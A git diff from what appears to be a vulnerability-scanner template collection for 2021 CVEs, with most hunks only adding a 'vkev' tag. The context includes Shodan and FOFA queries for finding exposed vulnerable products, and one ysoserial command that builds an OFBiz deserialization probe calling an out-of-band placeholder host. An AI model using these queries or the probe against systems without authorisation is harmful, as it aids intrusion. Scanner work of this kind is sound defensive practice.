cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian,kev + tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian,kev,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml index 832b4fb5ec7..49126a94598 100644 --- a/http/cves/2021/CVE-2021-26294.yaml +++ b/http/cves/2021/CVE-2021-26294.yaml @@ -28,7 +28,7 @@ info: fofa-query: - "X-Server: AfterlogicDAVServer" - "x-server: afterlogicdavserver" - tags: cve2021,cve,afterlogic,exposure,AfterLogic + tags: cve2021,cve,afterlogic,exposure,AfterLogic,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index 076c5330e70..1109a363ba9 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -38,7 +38,7 @@ info: - body="ofbiz" - app="apache_ofbiz" ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex - tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce + tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 6be9df8b291..1ebca0a2af1 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -35,7 +35,7 @@ info: - title="outlook" - icon_hash=1768726119 google-query: intitle:"outlook" - tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev + tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 98598edc1ff..7645b799ee2 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: yealink product: device_management - tags: cve2021,cve,rce,yealink,mirai,kev + tags: cve2021,cve,rce,yealink,mirai,kev,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index 3d487e278b1..643342b1b8d 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: apache product: tapestry - tags: cve,cve2021,apache,tapestry + tags: cve,cve2021,apache,tapestry,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index 28c75c02167..27cf3ac5a6a 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: lumis product: lumis_experience_platform - tags: cve2021,cve,lumis,xxe,oast,blind + tags: cve2021,cve,lumis,xxe,oast,blind,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-27964.yaml b/http/cves/2021/CVE-2021-27964.yaml index ae16ee7384d..cec0783c86b 100644 --- a/http/cves/2021/CVE-2021-27964.yaml +++ b/http/cves/2021/CVE-2021-27964.yaml @@ -22,7 +22,7 @@ info: product: sonlogger fofa-query: body="SonLogger" max-request: 2 - tags: cve,cve2021,sonlogger,intrusive + tags: cve,cve2021,sonlogger,intrusive,vkev flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index e9855adc336..3093f423a15 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: hongdian product: h8922_firmware - tags: cve2021,cve,hongdian,traversal + tags: cve2021,cve,hongdian,traversal,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index cfbc83736d1..4ac6baca7c5 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: hongdian product: h8922_firmware - tags: cve2021,cve,hongdian,exposure + tags: cve2021,cve,hongdian,exposure,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index 1ad44e6b7b3..84299d3af95 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: hongdian product: h8922_firmware - tags: cve2021,cve,hongdian,rce,injection + tags: cve2021,cve,hongdian,rce,injection,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 343d6098151..6a7c967ee8c 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -29,7 +29,7 @@ info: vendor: eclipse product: jetty shodan-query: cpe:"cpe:2.3:a:eclipse:jetty" - tags: cve2021,cve,jetty,eclipse + tags: cve2021,cve,jetty,eclipse,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index a28a615ab41..aa6dba5eab6 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: hp product: edgeline_infrastructure_manager - tags: cve2021,cve,hpe,bypass,tenable,hp + tags: cve2021,cve,hpe,bypass,tenable,hp,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index feb392bb92e..5e21fbcf751 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -34,7 +34,7 @@ info: max-request: 2 vendor: alibaba product: nacos - tags: cve2021,cve,nacos,auth-bypass,alibaba + tags: cve2021,cve,nacos,auth-bypass,alibaba,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index 0e64d557d51..72f5af20297 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: alibaba product: nacos - tags: cve2021,cve,nacos,auth-bypass,alibaba + tags: cve2021,cve,nacos,auth-bypass,alibaba,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index f0059b9ebf2..3a806104881 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -33,7 +33,7 @@ info: - http.title:"voipmonitor" fofa-query: title="voipmonitor" google-query: intitle:"voipmonitor" - tags: cve2021,cve,rce,voipmonitor + tags: cve2021,cve,rce,voipmonitor,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 78de26f4f9a..3b97f3ddf66 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -28,7 +28,7 @@ info: vendor: ivanti product: avalanche framework: windows - tags: cve2021,cve,avalanche,traversal,lfi,ivanti,windows + tags: cve2021,cve,avalanche,traversal,lfi,ivanti,windows,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index 5d8fa61ddef..6e8c48d9875 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: chiyu-tech product: bf-430_firmware - tags: cve2021,cve,chiyu,xss,iot,intrusive,chiyu-tech + tags: cve2021,cve,chiyu,xss,iot,intrusive,chiyu-tech,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index 0b4a2475938..3926fac684b 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -27,7 +27,7 @@ info: vendor: facade product: ignition framework: laravel - tags: cve2021,cve,laravel,rce,vulhub,kev,facade + tags: cve2021,cve,laravel,rce,vulhub,kev,facade,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index 3694d567bcf..cabb266a282 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -31,7 +31,7 @@ info: google-query: - '"BeyondTrust" "Redistribution Prohibited"' - '"beyondtrust" "redistribution prohibited"' - tags: cve,cve2021,xss,packetstorm,beyondtrust,bomgar + tags: cve,cve2021,xss,packetstorm,beyondtrust,bomgar,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index 3909882c6fb..0e124c9cbd5 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -30,7 +30,7 @@ info: shodan-query: - Pentaho - pentaho - tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi + tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index 292e5893319..1d600087172 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: tenda product: ac11_firmware - tags: cve2021,cve,tenda,rce,oast,router,mirai,kev + tags: cve2021,cve,tenda,rce,oast,router,mirai,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index e9f71fad6ff..7d7cba78402 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -35,7 +35,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve2021,cve,apache,rce,struts,struts2,intrusive + tags: cve2021,cve,apache,rce,struts,struts2,intrusive,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml index 9610421247f..9d5d19830db 100644 --- a/http/cves/2021/CVE-2021-32030.yaml +++ b/http/cves/2021/CVE-2021-32030.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: asus product: gt-ac2900_firmware - tags: cve2021,cve,asus,auth-bypass,router,kev + tags: cve2021,cve,asus,auth-bypass,router,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml index ba39ad367a8..b477c0772ee 100644 --- a/http/cves/2021/CVE-2021-32172.yaml +++ b/http/cves/2021/CVE-2021-32172.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: maianscriptworld product: maian_cart - tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld + tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index 26d4b91c24d..eb9fcd99214 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -36,7 +36,7 @@ info: - title="Node-RED" - title="node-red" google-query: intitle:"node-red" - tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js + tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index 937596921b3..80cd2fd4ea9 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: websvn product: websvn - tags: cve,cve2021,websvn,rce,oast,packetstorm + tags: cve,cve2021,websvn,rce,oast,packetstorm,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-32648.yaml b/http/cves/2021/CVE-2021-32648.yaml index 14412817f8d..089c5451a3c 100644 --- a/http/cves/2021/CVE-2021-32648.yaml +++ b/http/cves/2021/CVE-2021-32648.yaml @@ -24,7 +24,7 @@ info: vendor: octobercms product: october shodan-query: http.component:"october cms" - tags: cve,cve2021,cms,octobercms,intrusive,kev + tags: cve,cve2021,cms,octobercms,intrusive,kev,vkev variables: reset_token: "{{rand_base(42)}}" diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml index 6ad16df0eb4..4af9db6ec57 100644 --- a/http/cves/2021/CVE-2021-32789.yaml +++ b/http/cves/2021/CVE-2021-32789.yaml @@ -29,7 +29,7 @@ info: vendor: automattic product: woocommerce_blocks framework: wordpress - tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic + tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index df4acd936e3..d1a4039b178 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: squirrelly product: squirrelly - tags: cve2021,cve,nodejs,rce,oast,squirrelly + tags: cve2021,cve,nodejs,rce,oast,squirrelly,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index 9239dd8fa2a..44f365fcc11 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zyxel product: nbg2105_firmware - tags: cve,cve2021,zyxel,auth-bypass,router + tags: cve,cve2021,zyxel,auth-bypass,router,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index 04a6c598fa0..249fc244cb0 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: dahuasecurity product: ipc-hum7xxx_firmware - tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity,kev + tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-33045.yaml b/http/cves/2021/CVE-2021-33045.yaml index 40ab9feeb59..9454ebc9480 100644 --- a/http/cves/2021/CVE-2021-33045.yaml +++ b/http/cves/2021/CVE-2021-33045.yaml @@ -21,7 +21,7 @@ info: max-request: 1 vendor: dahuasecurity product: ipc-hum7xxx_firmware - tags: cve,cve2021,dahua,auth-bypass,seclists,kev + tags: cve,cve2021,dahua,auth-bypass,seclists,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index cb32bf1becd..e6c1724eeeb 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -30,7 +30,7 @@ info: product: raspap shodan-query: http.favicon.hash:-1465760059 fofa-query: icon_hash=-1465760059 - tags: cve2021,cve,rce,raspap,oast + tags: cve2021,cve,rce,raspap,oast,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index 6e7dabc655e..ff9c5ed5393 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: geutebrueck product: g-cam_ebc-2110 - tags: cve2021,cve,geutebruck,rce,oast,geutebrueck + tags: cve2021,cve,geutebruck,rce,oast,geutebrueck,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-33558.yaml b/http/cves/2021/CVE-2021-33558.yaml index 962af4d903d..f7f7417e19d 100644 --- a/http/cves/2021/CVE-2021-33558.yaml +++ b/http/cves/2021/CVE-2021-33558.yaml @@ -22,7 +22,7 @@ info: product: boa shodan-query: 'Server: Boa/0.94.13' fofa-query: "Server: Boa/0.94.13" - tags: cve,cve2021,boa,info-leak + tags: cve,cve2021,boa,info-leak,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml index 6b5803c08cf..02ac1c20225 100644 --- a/http/cves/2021/CVE-2021-33564.yaml +++ b/http/cves/2021/CVE-2021-33564.yaml @@ -28,7 +28,7 @@ info: vendor: dragonfly_project product: dragonfly framework: ruby - tags: cve2021,cve,rce,ruby,injection,dragonfly_project + tags: cve2021,cve,rce,ruby,injection,dragonfly_project,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index e5cd2f44b04..abb63c91ee6 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -30,7 +30,7 @@ info: - html:"SAP NetWeaver" - http.html:"sap netweaver" fofa-query: body="sap netweaver" - tags: cve2021,cve,oast,ssrf,sap + tags: cve2021,cve,oast,ssrf,sap,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-34187.yaml b/http/cves/2021/CVE-2021-34187.yaml index 50e73ffa284..f667ecb8223 100644 --- a/http/cves/2021/CVE-2021-34187.yaml +++ b/http/cves/2021/CVE-2021-34187.yaml @@ -24,7 +24,7 @@ info: fofa-query: 'banner="X-Powered-By: Chamilo"' verified: true max-request: 1 - tags: cve,cve2021,chamilo,sqli + tags: cve,cve2021,chamilo,sqli,vkev variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index ab0efec5ec0..28664539b9e 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -29,7 +29,7 @@ info: vendor: eclipse product: jetty shodan-query: cpe:"cpe:2.3:a:eclipse:jetty" - tags: cve2021,cve,jetty,eclipse + tags: cve2021,cve,jetty,eclipse,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 53cd0704699..23ccc2bdbe6 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -36,7 +36,7 @@ info: - title="outlook" - icon_hash=1768726119 google-query: intitle:"outlook" - tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft + tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml index 8c5ddd8a5c7..f985699b298 100644 --- a/http/cves/2021/CVE-2021-34621.yaml +++ b/http/cves/2021/CVE-2021-34621.yaml @@ -27,7 +27,7 @@ info: vendor: properfraction product: profilepress framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction + tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-34622.yaml b/http/cves/2021/CVE-2021-34622.yaml index b0891ebe571..1541d8239a5 100644 --- a/http/cves/2021/CVE-2021-34622.yaml +++ b/http/cves/2021/CVE-2021-34622.yaml @@ -23,7 +23,7 @@ info: vendor: properfraction product: profilepress fofa-query: body="/wp-content/plugins/profilepress" - tags: cve,cve2021,wordpress,wp-plugin,wp,profilepress,privilege-escalation,authenticated,intrusive + tags: cve,cve2021,wordpress,wp-plugin,wp,profilepress,privilege-escalation,authenticated,intrusive,vkev variables: username: "user_{{to_lower(rand_base(5))}}" diff --git a/http/cves/2021/CVE-2021-34624.yaml b/http/cves/2021/CVE-2021-34624.yaml index 5c77cb81b5c..0f170c0df8e 100644 --- a/http/cves/2021/CVE-2021-34624.yaml +++ b/http/cves/2021/CVE-2021-34624.yaml @@ -26,7 +26,7 @@ info: fofa-query: body="/wp-content/plugins/wp-user-avatar/" publicwww-query: "/wp-content/plugins/wp-user-avatar/" shodan-query: http.component:"profilepress" - tags: cve,cve2021,wordpress,wp-plugin,wp,wpscan,wp-user-avatar,profilepress,rce,file-upload,unauth,intrusive + tags: cve,cve2021,wordpress,wp-plugin,wp,wpscan,wp-user-avatar,profilepress,rce,file-upload,unauth,intrusive,vkev variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 6a4fdb85b7d..b2b07ff4722 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -30,7 +30,7 @@ info: shodan-query: - product:"Rhinosoft Serv-U httpd" - product:"rhinosoft serv-u httpd" - tags: cve2021,cve,solarwinds,traversal + tags: cve2021,cve,solarwinds,traversal,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index c154b8c53a4..14051730b30 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: realtek product: realtek_jungle_sdk - tags: cve2021,cve,realtek,rce,kev + tags: cve2021,cve,realtek,rce,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 07dcb06622d..7a8d929f3a3 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -36,7 +36,7 @@ info: - http.title:"openam" fofa-query: title="openam" google-query: intitle:"openam" - tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock + tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index bda6c5093e4..b4322d35980 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -37,7 +37,7 @@ info: - body="/oam/pages/css/login_page.css" - title="oracle access management" google-query: intitle:"oracle access management" - tags: cve2021,cve,oam,rce,java,unauth,oracle,kev + tags: cve2021,cve,oam,rce,java,unauth,oracle,kev,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index 42b26c50a67..e375f6ccea0 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: binatoneglobal product: halo\+_camera_firmware - tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal + tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index a3f4b5c2370..e0bc7fc5e2a 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -29,7 +29,7 @@ info: product: ds-2cd2026g2-iu\/sl_firmware shodan-query: http.favicon.hash:999357577 fofa-query: icon_hash=999357577 - tags: cve2021,cve,hikvision,rce,iot,intrusive,kev + tags: cve2021,cve,hikvision,rce,iot,intrusive,kev,vkev variables: string: "{{to_lower(rand_base(12))}}" diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 8b5fa9e1e1f..ae56769c2d3 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: kramerav product: viaware - tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav + tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev variables: useragent: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 3c7be73fbd6..9e7d2ff64be 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: sunhillo product: sureline - tags: cve2021,cve,sureline,rce,oast,sunhillo,kev + tags: cve2021,cve,sureline,rce,oast,sunhillo,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml index 28f1cadfaef..d5331c2f3cf 100644 --- a/http/cves/2021/CVE-2021-36749.yaml +++ b/http/cves/2021/CVE-2021-36749.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: apache product: druid - tags: cve2021,cve,apache,lfi,auth-bypass,druid + tags: cve2021,cve,apache,lfi,auth-bypass,druid,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index 91cd12a202e..740eb02de84 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -28,7 +28,7 @@ info: vendor: smartdatasoft product: smartblog framework: prestashop - tags: cve2021,cve,prestashop,smartblog,sqli,smartdatasoft + tags: cve2021,cve,prestashop,smartblog,sqli,smartdatasoft,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 3a857cf6a09..f38861287fd 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: apache product: shenyu - tags: cve2021,cve,apache,jwt,shenyu + tags: cve2021,cve,apache,jwt,shenyu,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index 0e434673f03..de48c2d7686 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microsoft product: azure_automation_state_configuration - tags: cve2021,cve,rce,omi,microsoft,kev + tags: cve2021,cve,rce,omi,microsoft,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index 524de163c9e..21c01a5922f 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cyberoamworks product: netgenie_c0101b1-20141120-ng11vo_firmware - tags: cve2021,cve,cyberoam,netgenie,xss,router,seclists,packetstorm,cyberoamworks + tags: cve2021,cve,cyberoam,netgenie,xss,router,seclists,packetstorm,cyberoamworks,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml index 594acebae95..fb188308273 100644 --- a/http/cves/2021/CVE-2021-39144.yaml +++ b/http/cves/2021/CVE-2021-39144.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve2021,cve,xstream,deserialization,rce,kev,xstream_project + tags: cve2021,cve,xstream,deserialization,rce,kev,xstream_project,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 245244134b4..19ffb5a3fbf 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -33,7 +33,7 @@ info: - icon_hash="-1474875778" - title="glpi" google-query: intitle:"glpi" - tags: cve,cve2021,glpi,exposure,glpi-project + tags: cve,cve2021,glpi,exposure,glpi-project,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 2e450bedebd..dcf92a0315c 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -34,7 +34,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve2021,cve,grafana,kev + tags: cve2021,cve,grafana,kev,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml index 06ed185a000..ed7e2a34364 100644 --- a/http/cves/2021/CVE-2021-39312.yaml +++ b/http/cves/2021/CVE-2021-39312.yaml @@ -25,7 +25,7 @@ info: vendor: trueranker product: true_ranker framework: wordpress - tags: cve,cve2021,unauth,lfr,wpscan,wp-plugin,lfi,wp,wordpress,trueranker + tags: cve,cve2021,unauth,lfr,wpscan,wp-plugin,lfi,wp,wordpress,trueranker,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index fab07706f26..f1dd7007780 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -28,7 +28,7 @@ info: vendor: digitalzoomstudio product: zoomsounds framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio + tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-39341.yaml b/http/cves/2021/CVE-2021-39341.yaml index 976aac453b7..f259f4bcacb 100644 --- a/http/cves/2021/CVE-2021-39341.yaml +++ b/http/cves/2021/CVE-2021-39341.yaml 